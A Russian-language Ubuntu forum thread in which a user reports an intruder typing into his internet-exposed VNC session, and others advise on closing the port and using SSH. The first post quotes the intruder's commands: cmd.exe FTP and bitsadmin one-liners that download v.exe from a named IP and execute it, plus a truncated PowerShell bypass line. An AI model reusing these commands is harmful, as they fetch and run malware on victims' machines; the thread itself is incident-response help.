Форум русскоязычного сообщества Ubuntu


Получить помощь и пообщаться с другими пользователями Ubuntu можно
на irc канале #ubuntu-ru в сети Freenode
и в Jabber конференции ubuntu@conference.jabber.ru

Автор Тема: Вирус  (Прочитано 1103 раз)

0 Пользователей и 1 Гость просматривают эту тему.

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Вирус
« : 27 Февраль 2019, 16:02:23 »
Добрый день. Стояла Ubuntu 12 с бд (реплика), в общем ничего не скачивалось и для серфинга не использовалась, тупо для бд. В один момент, захожу удаленно и вижу что символы сами печатаются (будто кто-кто по клавишам стучит), хотя помещение пустое (смотрел по камерам). Значки на раб. столе стали с цифрами
Вот текст ввода:
cmd.exe
cmd.exe /c "@echo open 92.63.197.153>>ftpget.txt&@echo tom>>ftpget.txt&@echo hehehe>>ftpget.txt&@echo binary>>ftpget.txt&@echo get v.exe>>ftpget.txt&@echo quit>>ftpget.txt&@ftp -s:ftpget.txt&@start v.exe"&exit

cmd.exe
bitsadmin /transfer getitman /download /priority high http://92.63.197.153/work/v.exe %temp%\4905930304945.exe&start %temp%\4905930304945.exe&exit
rPowerShell -ExecutionPolicy Bypass (New-Object System.Net.WebClie

Собственно вопрос, что делать? Я даже не знаю какой процесс вырубить чтобы убрать автоввод

Оффлайн bezbo

  • Старожил
  • *
  • Сообщений: 1428
    • Просмотр профиля
Re: Вирус
« Ответ #1 : 27 Февраль 2019, 16:07:35 »
проверить свой комп на вирусы/трояны и поменять винду на Ubuntu

Оффлайн zg_nico

  • Заслуженный пользователь
  • Модератор форума
  • Старожил
  • *
  • Сообщений: 3511
  • Nil mortalibus arduum est
    • Просмотр профиля
Re: Вирус
« Ответ #2 : 27 Февраль 2019, 19:50:07 »
что делать?
Удаленный доступ. Либо меняйте пароль, т.к. текущий скомпрометирован, либо вообще его перекрывайте. То что там печатается слабо похоже на вирус - предполагаю, что живой человек ломать пытается в реальном времени, причем работает он с машиной тем же способом, которым Вы за экраном наблюдали, и, вполне возможно, слабо понимает что при этом делает (отсюда и попытки запуска cmd.exe). Сканирование на вирусы в любом случае тоже необходимо. Причем как подконтрольной машине на Ubuntu, так и Вашему ПК, откуда осуществляете удаленный доступ.
Сужу поверхностно. На истину в последней инстанции не претендую, т.к. в вопросе разбираюсь слабо.
Thunderobot G150-D2: Intel SkyLake Core i7-6700HQ 2.60GHz, 8Gb DDR4 2133 MHz, Intel HD530, NVidia GeForce GTX 960M 2Gb.  Ubuntu 16.04 64x [Unity], KUbuntu 18.04 64x.

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Re: Вирус
« Ответ #3 : 28 Февраль 2019, 10:24:19 »
проверить свой комп на вирусы/трояны и поменять винду на Ubuntu
Итак Ubuntu стоит

Оффлайн bezbo

  • Старожил
  • *
  • Сообщений: 1428
    • Просмотр профиля
Re: Вирус
« Ответ #4 : 28 Февраль 2019, 10:30:02 »
Ubuntu стоит

Ubuntu 12 с бд (реплика):
sudo lastb?

и еще, проверяйте те компы, которые имеют доступ к вашей реплике
« Последнее редактирование: 28 Февраль 2019, 10:33:08 от bezbo »

Оффлайн Heider

  • Старожил
  • *
  • Сообщений: 1250
    • Просмотр профиля
Re: Вирус
« Ответ #5 : 28 Февраль 2019, 11:02:02 »
А что там открыто у вас?
sudo netstat -ntulp | grep LISTEN
« Последнее редактирование: 28 Февраль 2019, 11:06:37 от Heider »

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Re: Вирус
« Ответ #6 : 28 Февраль 2019, 13:28:47 »
А что там открыто у вас?
sudo netstat -ntulp | grep LISTEN
[sudo] password for goodmoney:
tcp        0      0 0.0.0.0:63333           0.0.0.0:*               LISTEN                                                                                              977/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN                                                                                              1289/mysqld
tcp        0      0 0.0.0.0:5900            0.0.0.0:*               LISTEN                                                                                              11247/vino-server
tcp        0      0 0.0.0.0:10000           0.0.0.0:*               LISTEN                                                                                              1994/perl
tcp        0      0 127.0.0.1:53            0.0.0.0:*               LISTEN                                                                                              2024/dnsmasq
tcp        0      0 127.0.0.1:631           0.0.0.0:*               LISTEN                                                                                              1093/cupsd
tcp6       0      0 :::63333                :::*                    LISTEN                                                                                              977/sshd
tcp6       0      0 :::5800                 :::*                    LISTEN                                                                                              11247/vino-server
tcp6       0      0 :::5900                 :::*                    LISTEN                                                                                              11247/vino-server
tcp6       0      0 :::10000                :::*                    LISTEN                                                                                              1994/perl
tcp6       0      0 :::80                   :::*                    LISTEN                                                                                              1329/apache2
tcp6       0      0 ::1:631                 :::*                    LISTEN                                                                                              1093/cupsd
tcp6       0      0 :::443                  :::*                    LISTEN                                                                                              1329/apache2

Цитировать
Правила форума
1.4. Листинги и содержимое текстовых файлов следует добавлять в сообщение с помощью тегов [spoiler]...[/spoiler] или [code]...[/code], либо прикреплять к сообщению в виде отдельного файла. Длинные гиперссылки следует оформлять при помощи тега [url=]...[/url]

  --Aleksandru
« Последнее редактирование: 28 Февраль 2019, 13:37:49 от Aleksandru »

Оффлайн Heider

  • Старожил
  • *
  • Сообщений: 1250
    • Просмотр профиля
Re: Вирус
« Ответ #7 : 28 Февраль 2019, 15:29:33 »
У вас vino-server в открытую слушает весь интернет на стандартном порту. Вообще-то это нехорошо. Нужно либо ограничится локальной сетью, либо настроить VPN, либо туннелирование по SSH.

И зачем вам вообще этот сервис, если сервак используется только для БД? Снесите его и настройте себе номальный доступ по ssh.
« Последнее редактирование: 28 Февраль 2019, 15:37:57 от Heider »

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Re: Вирус
« Ответ #8 : 04 Март 2019, 11:25:11 »
У вас vino-server в открытую слушает весь интернет на стандартном порту. Вообще-то это нехорошо. Нужно либо ограничится локальной сетью, либо настроить VPN, либо туннелирование по SSH.

И зачем вам вообще этот сервис, если сервак используется только для БД? Снесите его и настройте себе номальный доступ по ssh.
Спасибо за подсказку. До этого юзал обычный SSH  доступ, но после перезагрузки нельзя было запустить граф интерфейс. То есть пока не введешь логин и пароль вручную чтобы войти в раб. стол, удаленно не подключишься (только через терминал).
А как сделать белый список адресов для подключению по опред. порту?
« Последнее редактирование: 04 Март 2019, 11:29:14 от orenmoney »

Оффлайн Heider

  • Старожил
  • *
  • Сообщений: 1250
    • Просмотр профиля
Re: Вирус
« Ответ #9 : 05 Март 2019, 09:41:04 »
А как сделать белый список адресов для подключению по опред. порту?
Или через iptables или в самой службе, которая слушает порт, но я не спец по vino-server. По ssh могу подсказать. Да вы и сами разберетесь, там легко.
« Последнее редактирование: 05 Март 2019, 09:42:59 от Heider »

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Re: Вирус
« Ответ #10 : 05 Март 2019, 09:43:50 »
А как сделать белый список адресов для подключению по опред. порту?
Или через iptables или в самой службе, которая слушает порт, но я не спец по vino-server. По ssh могу подсказать. Да вы и сами разберетесь, там легко.
Не подскажете про второй вариант? Ну или статью где это описывается

Оффлайн Heider

  • Старожил
  • *
  • Сообщений: 1250
    • Просмотр профиля
Re: Вирус
« Ответ #11 : 05 Март 2019, 09:50:30 »
Не подскажете про второй вариант? Ну или статью где это описывается
ssh? Файл /etc/ssh/sshd_config параметр ListenAddress, подробнее здесь.

Оффлайн orenmoney

  • Автор темы
  • Новичок
  • *
  • Сообщений: 16
    • Просмотр профиля
Re: Вирус
« Ответ #12 : 05 Март 2019, 10:04:00 »
Не подскажете про второй вариант? Ну или статью где это описывается
ssh? Файл /etc/ssh/sshd_config параметр ListenAddress, подробнее здесь.
Благодарю

 

Страница сгенерирована за 0.121 секунд. Запросов: 22.